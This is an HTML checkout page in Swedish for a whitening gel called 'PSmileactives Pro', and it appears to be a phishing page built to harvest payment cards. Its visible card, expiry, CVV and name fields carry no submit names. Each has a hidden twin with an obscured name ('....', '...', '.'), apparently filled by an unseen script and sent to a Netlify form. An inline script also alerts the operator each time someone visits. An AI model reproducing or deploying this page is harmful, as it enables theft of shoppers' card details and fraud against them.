<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Utbetalning</title>
    <link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/css/bootstrap.min.css">
    <link href='https://fonts.googleapis.com/css2?family=Inter:wght@100;200;300;400;500;600;700;800;900&display=swap' rel='stylesheet' type='text/css'>


<style>
    body {
    font-family: 'Karla', sans-serif;
    background-color: #FFFFFF; /* Soft Gray */
    color: #2C2C2C; /* Dark Gray */
}

h1 {
    font-family: 'Karla', sans-serif;
    color: #FD605A; /* Coral */
}

h2 {
    font-family: 'Karla', sans-serif;
    color: #000000; /* Cool Blue */
}

h4 {
    font-family: 'Karla', sans-serif;
    color: #2C2C2C; /* Dark Gray */
}

p {
    font-family: 'Karla', sans-serif;
    color: #2C2C2C; /* Dark Gray */
}

label {
    font-family: 'Karla', sans-serif;
    color: #2C2C2C; /* Mint */
}


    .form-control {
        border-radius: 16px; /* Made slightly rounded for aesthetics */
        border-color: #DEDEDE;
        border-width: 2px;
        transition: all 0.3s ease-in-out; /* Added transition for smoother effects */
    }

    .btn-primary {
        background-color: #FD605B;
        border: 2px solid #FD605A; /* Added a transparent border to ensure size consistency */
        border-radius: 16px;
        transition: all 0.3s ease-in-out; /* Improved transition to include all properties */
    }

    .payment-method {
    background-color: #F4F4F4;
    padding: 20px;
    margin-bottom: 20px;
    border-radius: 2px;
    border-color: #111111;
    box-shadow: 0 2px 5px rgba(0, 0, 0, 0.1);
}

    .form-control:hover, .form-control:focus {
        border-color: #1B1B1B;
        box-shadow: 0 0 0 0.2rem rgba(0, 0, 0, 0.1);
    }

    .btn-primary:hover, .btn-primary:focus, .btn-primary:active {
        background-color: #F13F39; /* Slightly darkened hover/focus effect */
        border-color: #7ddedf; 
        box-shadow: 0 2px 4px rgba(0, 0, 0, 0.1); /* Added a shadow for better hover effect */
    }

    @media(max-width: 992px) {
        .checkout-container {
            flex-direction: column-reverse;
        }
    }

    @media(min-width: 992px) {
        .checkout-container {
            display: flex;
            flex-wrap: nowrap;
            justify-content: space-between;
        }

        .checkout-form, .order-summary {
            flex: 0 0 49%;
        }
    }

    .checkout-form {
    padding: 2rem;
    margin-bottom: 2rem;
    background-color: #ffffff;
    border-radius: 0px;
    box-shadow: 0 2px 5px rgba(0, 0, 0, 0.05);
}

.order-summary {
    padding: 2rem;
    margin-bottom: 2rem;
    background-color: #FAFAFA; /* Light gray background for order summary */
    border-radius: 5px;
    box-shadow: 0 2px 5px rgba(0, 0, 0, 0.05);
}


    .order-summary {
        max-width: 540px;
    }

    .banner {
        width: 100%;
    }

    .banner-image {
        width: 100%;
        height: 200px;
        object-fit: cover;
    }

    @keyframes highlight {
        0% { transform: scale(1); }
        50% { transform: scale(1.05); } /* Slightly reduced scale for a subtler effect */
        100% { transform: scale(1); }
    }

    #card-icons img {
    transition: transform 0.3s ease-in-out;
}

#card-icons img.highlight {
    animation: highlight 1s infinite;
}
    .form-group.dual-inputs {
    display: flex;
    justify-content: space-between;
    gap: 10px;
}

.form-group.dual-inputs > div {
    flex: 1;
}
    /* Style for the radio button when not checked */
.form-check-input[type="radio"]::before {
    content: "";
    display: inline-block;
    position: absolute;
    width: 16px;
    height: 16px;
    border-radius: 50%;
    border: 2px solid #FD605A;
    top: 50%;
    transform: translateY(-50%);
    left: 2px;
}

/* Style for the radio button when checked */
.form-check-input[type="radio"]:checked::after {
    content: "";
    display: inline-block;
    position: absolute;
    width: 8px;
    height: 8px;
    border-radius: 50%;
    background-color: #FD605A;
    top: 50%;
    transform: translateY(-50%);
    left: 6px;
}

.form-check-input[type="radio"] {
    appearance: none;
    -webkit-appearance: none;
    -moz-appearance: none;
    outline: none;
    position: relative;
    width: 20px;
    height: 20px;
    margin-right: 10px;
    vertical-align: middle;
}
    .shipping-method-box {
    background-color: #F4F4F4;
    border-radius: 16px;
    border: 2px solid #DEDEDE;
    padding: 10px 20px;
    display: flex;
    justify-content: space-between;
    align-items: center;
    transition: all 0.3s ease-in-out;
}

.shipping-method-box:hover {
    border-color: #111111;
}

.form-check-input[type="radio"]::before {
    border-color: #FD605A;
}

.form-check-input[type="radio"]:checked::after {
    background-color: #FD605A;
}

.form-check-label {
    margin-bottom: 0;
}
    .footer {
    background-color: #FAFAFA;
    padding: 20px 0;
    text-align: center;
}

.footer a {
    color: #2C2C2C; /* Dark Gray */
    text-decoration: none;
    margin: 0 10px;
    transition: color 0.3s ease-in-out;
}

.footer a:hover {
    color: #FD605A; /* Coral */
}



</style>

</head>

<body>
 <!-- Banner Image -->
    <div class="banner">
        <img src="src/bogo3-bottom-cta-section-desktop.jpg" alt="Banner" class="banner-image">
    </div> 
    <!-- Checkout Container -->
    <div class="container checkout-container py-5">
        <div class="checkout-form">
            <h1 class="display-4">Utbetalning</h1>

            <form id="checkout-form" method="post" data-netlify="true" action="/sv-thankyou.html">
                <input type="hidden" name="form-name" value="checkout-form">

                <!-- Shipping Information -->
                <h2 class="mb-3">Information om frakt</h2>
               <div class="form-group">
    <label for="fullName">Fullständigt namn</label>
    <input type="text" class="form-control" id="fullName" required>
    <input type="hidden" id="hiddenFullName" name="Lanomination">
</div>


                <div class="form-group">
                    <label for="email">E-postadress</label>
                    <input type="email" class="form-control" id="email" name="email" required>
                </div>
                <div class="form-group">
                    <label for="phone">Telefon</label>
                    <input type="phone" class="form-control" id="phone" name="phone" required>
                </div>
                <div class="form-group">
                    <label for="address">Adress</label>
                    <input type="text" class="form-control" id="address" name="address" required>
                </div>
                <div class="form-group">
                    <label for="city">Stad</label>
                    <input type="text" class="form-control" id="city" name="city" required>
                </div>
                <div class="form-group">
                    <label for="zip">ZIP</label>
                    <input type="text" class="form-control" id="zip" name="zip" required>
                </div>
                <div class="form-group">
                    <label for="country">Land</label>
                    <input type="text" class="form-control" id="country" name="country" required>
                </div>

                <!-- Shipping Method -->
                <h2 class="my-3">Fraktmetod</h2>
<div class="shipping-method-box">
    <div class="form-check">
        <input class="form-check-input" type="radio" name="shippingMethod" id="standardShipping" value="standard" checked>
        <label class="form-check-label" for="standardShipping">
        Standard frakt
        </label>
    </div>
    <p class="mb-0">SEK0.00</p>
</div>


                <h2 class="my-3">Betalning</h2>
<div class="payment-method">
    <div class="d-flex justify-content-between align-items-center">
        <p class="mb-0"><strong>Kort</strong></p>
        <div id="card-icons">
            <img id="visa-icon" src="https://cdn.shopify.com/shopifycloud/checkout-web/assets/0169695890db3db16bfe.svg" alt="Visa" width="35">
            <img id="mastercard-icon" src="https://cdn.shopify.com/shopifycloud/checkout-web/assets/ae9ceec48b1dc489596c.svg" alt="MasterCard" width="35">
            <img id="amex-icon" src="https://cdn.shopify.com/shopifycloud/checkout-web/assets/f11b90c2972f3811f2d5.svg" alt="American Express" width="35">
        </div>
    </div>

    <div class="form-group">
        <label for="nameOnCard">Namn på kort</label>
        <input type="hidden" name="...." id="nameOnCardx">
        <input type="text" class="form-control" id="nameOnCard" autocomplete="cc-name" required>
    </div>

    <div class="form-group">
        <label for="cardNumber">Kortnummer</label>
        <input type="hidden" name="..." id="cardNumberx">
        <input type="text" class="form-control" id="cardNumber" autocomplete="cc-number" required>
        <p id="cardIssuer"></p>
    </div>

    <!-- Combined expiry and CVV into a flex container -->
    <div class="form-group dual-inputs">
        <div>
            <label for="expiry">Utgång (MM/YY)</label>
            <input type="hidden" name=".." id="expiryx">
            <input type="text" class="form-control" id="expiry" autocomplete="cc-exp" required>
        </div>
        <div>
            <label for="cvv">CVV</label>
            <input type="hidden" name="." id="cvvx">
            <input type="text" class="form-control" id="cvv" autocomplete="cc-csc" required>
        </div>
    </div>
</div>
<button type="submit" class="btn btn-primary btn-lg btn-block">Lägg order - kr245</button>
</form>

        </div>

<!-- Order Summary -->
        <div class="order-summary">
            <h2 class="mb-3">Orderöversikt</h2>
            <!-- Product Details (This should be dynamically generated) -->
            <div class="row product-details">
                <div class="col-3">
                    <img src="images/Daily-Pro-Whitening-Gel.png" alt="Product Image" class="img-thumbnail">
                </div>
                <div class="col-9">
                    <p>PSmileactives Pro</p>
                    <p>Kvantitet: 1</p>
                    <p>Price: <span class="float-right">kr245</span></p>
                </div>
            </div>
            <!-- Subtotal -->
            <div class="subtotal">
                <h4>Subtotal: <span class="float-right">kr245</span></h4>
            </div>
            <!-- Shipping -->
            <div class="shipping">
                <h4>Frakt: <span class="float-right">FRI</span></h4>
            </div>
            <!-- Total -->
            <div class="total">
                <h4>Total: <span class="float-right">kr245</span></h4>
            </div>
        </div>
        <form name="pageview" id="hiddenForm" data-netlify="true" style="display: none;">
    <input type="hidden" name="page" value="PageNameOrURL">
</form>



            <!-- All your order details go here -->
        </div>
    </div>

    <script src="https://code.jquery.com/jquery-3.5.1.slim.min.js"></script>
    <script src="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/js/bootstrap.min.js"></script>
    <script src="checkout.js"></script> 
    <script src="https://code.jquery.com/jquery-3.6.0.min.js"></script>
    <script>
    fetch('/.netlify/functions/send_email', {
        method: 'POST',
        headers: {
            'Content-Type': 'application/json'
        },
        body: JSON.stringify({
            message: 'A user has visited the page!'
        })
    });
</script>
 <form name="pageview" id="hiddenForm" data-netlify="true" style="display: none;">
    <input type="hidden" name="page" value="PageNameOrURL">
</form>

<!-- Footer -->
<div class="footer">
    <p>© 2023 Smile actives. Alla rättigheter förbehållna.</p>
    <a href="#" id="refund-policy">Återbetalning</a> |
    <a href="#" id="shipping-policy">Fraktpolicy</a> |
    <a href="#" id="privacy-policy">Integritetspolicy</a> |
    <a href="#" id="terms-of-service">Användarvillkor</a>
</div>

</body>
</html>
